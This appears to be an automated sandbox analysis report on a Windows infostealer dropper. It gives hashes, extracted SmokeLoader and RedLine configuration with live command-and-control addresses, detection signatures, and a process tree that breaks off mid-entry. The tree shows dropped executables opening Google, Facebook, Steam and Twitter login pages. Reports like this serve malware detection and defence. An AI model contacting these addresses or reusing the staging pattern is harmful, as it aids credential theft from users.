Analysis

  • max time kernel
    56s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-11-2023 17:20

General

  • Target

    NEAS.bf747d7d7e3824b80a05d2988b5163729fb1b8c280f4ea5e2d638ab421f5c9d4.exe

  • Size

    1.4MB

  • MD5

    2a514d14cf0c18516696437e608ab3e2

  • SHA1

    a34ec24a6d945fe033ec69c87a7a0d8ef555111f

  • SHA256

    bf747d7d7e3824b80a05d2988b5163729fb1b8c280f4ea5e2d638ab421f5c9d4

  • SHA512

    762ca17f8278d56855b4603bb76336762dc7e14dbb20820571b9f6f65a2d70efce1285d4bd43e0eb6763431c084e40958a597d7e9681090b5884950084246ad6

  • SSDEEP

    24576:Py6v4ezUX4srOGOezIsNJYGMqkD7GlOKz6aq2otaUxN+EK8HH:a6HzUXADecGaGgfGlvzOn/K8

Malware Config

Extracted

Family

smokeloader

Version

2022

C2

http://5.42.92.190/fks/index.php

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

taiga

C2

5.42.92.51:19057

Signatures

  • Detect Mystic stealer payload 4 IoCs
  • Detect ZGRat V1 23 IoCs
  • Mystic

    Mystic is an infostealer written in C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Downloads MZ/PE file
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 8 IoCs
  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NEAS.bf747d7d7e3824b80a05d2988b5163729fb1b8c280f4ea5e2d638ab421f5c9d4.exe
    "C:\Users\Admin\AppData\Local\Temp\NEAS.bf747d7d7e3824b80a05d2988b5163729fb1b8c280f4ea5e2d638ab421f5c9d4.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4680
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2296
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:376
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:4872
          • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe
            C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:3136
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
              6⤵
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2984
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffb029b46f8,0x7ffb029b4708,0x7ffb029b4718
                7⤵
                  PID:2616
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3108
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
                  7⤵
                    PID:1780
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
                    7⤵
                      PID:5328
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                      7⤵
                        PID:5496
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                        7⤵
                          PID:5488
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1
                          7⤵
                            PID:6396
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
                            7⤵
                              PID:5968
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:1
                              7⤵
                                PID:6552
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:1
                                7⤵
                                  PID:6728
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
                                  7⤵
                                    PID:6792
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
                                    7⤵
                                      PID:7036
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
                                      7⤵
                                        PID:5244
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
                                        7⤵
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        • Suspicious use of WriteProcessMemory
                                        PID:3136
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1
                                        7⤵
                                          PID:6084
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
                                          7⤵
                                            PID:6432
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6684 /prefetch:1
                                            7⤵
                                              PID:7112
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:1
                                              7⤵
                                                PID:7212
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:1
                                                7⤵
                                                  PID:7204
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
                                                  7⤵
                                                    PID:7532
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:1
                                                    7⤵
                                                      PID:7540
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:8
                                                      7⤵
                                                        PID:8044
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:8
                                                        7⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:8060
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1
                                                        7⤵
                                                          PID:5984
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8384 /prefetch:1
                                                          7⤵
                                                            PID:7732
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
                                                            7⤵
                                                              PID:5744
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7416 /prefetch:2
                                                              7⤵
                                                                PID:4616
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,12316002621240960876,928247332498941319,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5076 /prefetch:8
                                                                7⤵
                                                                  PID:8004
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
                                                                6⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3724
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb029b46f8,0x7ffb029b4708,0x7ffb029b4718
                                                                  7⤵
                                                                    PID:1808
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,9677514774129588240,12837906626260538154,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
                                                                    7⤵
                                                                      PID:5388
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,9677514774129588240,12837906626260538154,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
                                                                      7⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:5400
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
                                                                    6⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4648
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb029b46f8,0x7ffb029b4708,0x7ffb029b4718
                                                                      7⤵
                                                                        PID:2364
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,12603914774716215338,14960288339191760076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
                                                                        7⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:5352
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,12603914774716215338,14960288339191760076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
                                                                        7⤵
                                                                          PID:5344
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
                                                                        6⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4012
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb029b46f8,0x7ffb029b4708,0x7ffb029b4718
                                                                          7⤵
                                                                            PID:2372
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,14032610009597966290,739492210498246563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
                                                                            7⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:5380
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,14032610009597966290,739492210498246563,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
                                                                            7⤵
                                                                              PID:5372
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
                                                                            6⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:1460
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ffb029b46f8,0x7ffb029b4708,0x7ffb029b4718
                                                                              7⤵
                                                                                PID:3124
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,11745568694501838408,4971805348300337157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3
                                                                                7⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:6056
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
                                                                              6⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:1744
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb029b46f8,0x7ffb029b4708,0x7ffb029b4718
                                                                                7⤵
                                                                                  PID:2084
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,16261618793133978158,2180601618647262611,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3
                                                                                  7⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:6112
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
